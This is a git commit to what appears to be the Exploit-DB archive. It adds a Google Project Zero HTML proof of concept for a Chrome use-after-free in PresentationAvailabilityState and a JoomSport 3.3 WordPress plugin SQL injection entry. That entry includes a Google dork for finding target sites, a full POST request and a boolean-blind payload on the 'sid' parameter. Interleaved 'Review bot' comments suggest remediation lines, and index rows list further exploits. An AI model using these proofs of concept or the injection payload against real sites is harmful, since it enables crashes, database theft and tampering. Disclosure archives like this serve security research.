DB: 2019-08-08
2 changes to exploits/shellcodes Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability WordPress Plugin JoomSport 3.3 - SQL Injection
This commit is contained in:
parent
fe9103a0fb
commit
44a9c2cd04
3 changed files with 95 additions and 0 deletions
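--- a/exploits/multiple/dos/47211.html
+++ b/exploits/multiple/dos/47211.html
@@ -0,0 +1,47 @@
+<!--
+VULNERABILITY DETAILS
+void PresentationAvailabilityState::UpdateAvailability(
+const KURL& url,
+mojom::blink::ScreenAvailability availability) {
+[...]
+{
+// Set |iterating_listeners_| so we know not to allow modifications
+// to |availability_listeners_|.
+base::AutoReset<bool> iterating(&iterating_listeners_, true);
+for (auto& listener_ref : availability_listeners_) {
+auto* listener = listener_ref.get();
+if (!listener->urls.Contains<KURL>(url))
+continue;
+
+auto screen_availability = GetScreenAvailability(listener->urls);
+DCHECK(screen_availability != mojom::blink::ScreenAvailability::UNKNOWN);
+for (auto* observer : listener->availability_observers)
+observer->AvailabilityChanged(screen_availability); // ***1***
+[...]
+
+`PresentationAvailabilityObserver::AvailabilityChanged` might call a user-defined JS event handler,
+which in turn might modify `availability_observers` and invalidate the `for` loop's iterator.
+
+VERSION
+Chromium 74.0.3729.0 (Developer Build) (64-bit)
+Chromium 76.0.3789.0 (Developer Build) (64-bit)
+
+REPRODUCTION CASE
+Note that you need an extra display connected to your machine to reproduce the bug, otherwise
+`UpdateAvailability` won't be called.
+-->
+
+<body>
+<script>
+frame = document.body.appendChild(document.createElement("iframe"));
+request = new frame.contentWindow.PresentationRequest([location]);
+request.getAvailability().then(availability => {
+availability.onchange = () => frame.remove();
+});
+</script>
+</body>
+
+<!--
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero.
+-->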
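Review bot: The VULNERABILITY DETAILS comment identifies the re-entrant callback at `***1***` but never names the guard that is missing: the `base::AutoReset<bool> iterating(&iterating_listeners_, true)` line protects only `availability_listeners_`, while the inner `for (auto* observer : listener->availability_observers)` loop has no equivalent protection, which is exactly the container the text says a JS handler can modify. A one-line addition after the `which in turn might modify …` sentence would make the defect class explicit for anyone triaging similar code: `Mitigation pattern: iterate over a snapshot of availability_observers, or defer add/remove until the loop finishes, so a re-entrant handler cannot invalidate the live iterator.` The VERSION block lists two affected developer builds but no fixed version or tracker reference, so a reader cannot tell from this file when the issue was closed; a `FIXED IN: <VERSION_PLACEHOLDER>` line under VERSION would close that gap. UpdateAvailability is shown elided with `[...]`, so the full body of the function lies outside this file.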
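--- a/exploits/php/webapps/47210.txt
+++ b/exploits/php/webapps/47210.txt
@@ -0,0 +1,46 @@
+# Exploit Title: JoomSport 3.3 – for Sports - SQL injection
+# Google Dork: intext:powered by JoomSport - sport WordPress plugin
+# Date:29/07/2019.
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://beardev.com/
+# Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management/
+# Version: 3.3
+# Tested on: Windows and Kali linux
+# CVE :2019-14348
+# References: https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/
+
+# 1. Technical Description:
+#Through the SQL injection vulnerability, a malicious user could
+inject SQL code in order to steal information from the database,
+modify data from the database, even delete database or data from
+them.
+
+#2. Request: All requests that contains the parameter sid are
+vulnerables to SQL injection
+
+POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
+Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
+Upgrade-Insecure-Requests: 1
+
+sid=1&page=1&jscurtab=
+
+# 3. Payload:
+
+Parameter: sid (POST)
+Type: boolean-based blind
+Title: Or boolean-based blind - WHERE or HAVING clause
+Payload: sid=-3506 OR 7339=7339&page=1jscurtab=
+
+# 4. Reference:
+# https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/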
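Review bot: The advisory records the affected version and a CVE but no patched version or remediation, so an operator reading it cannot tell whether a current JoomSport install is still exposed; a `# Fixed in: <VERSION_PLACEHOLDER>` line next to `# Version: 3.3` would close that gap. Since section 2 states that every request carrying `sid` is injectable, a one-sentence remediation under section 1 — the `sid` value should be cast to an integer (e.g. `absint()`) or bound through `$wpdb->prepare()` before it reaches any query — would serve plugin maintainers and defenders better than the blind-injection payload alone. The `# Date:29/07/2019.` header line is also missing a space after the colon and carries a stray trailing period, which breaks the otherwise uniform `# Key: value` layout of the header.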
|
@ -6521,6 +6521,7 @@ id,file,description,date,author,type,platform,port
|
|||
47193,exploits/multiple/dos/47193.txt,"iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1",2019-07-30,"Google Security Research",dos,multiple,
|
||||
47194,exploits/multiple/dos/47194.txt,"iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects",2019-07-30,"Google Security Research",dos,multiple,
|
||||
47207,exploits/macos/dos/47207.txt,"macOS iMessage - Heap Overflow when Deserializing",2019-08-05,"Google Security Research",dos,macos,
|
||||
47211,exploits/multiple/dos/47211.html,"Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability",2019-08-07,"Google Security Research",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -41577,3 +41578,4 @@ id,file,description,date,author,type,platform,port
|
|||
47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80
|
||||
47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
|
||||
47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80
|
||||
47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80
|
||||
|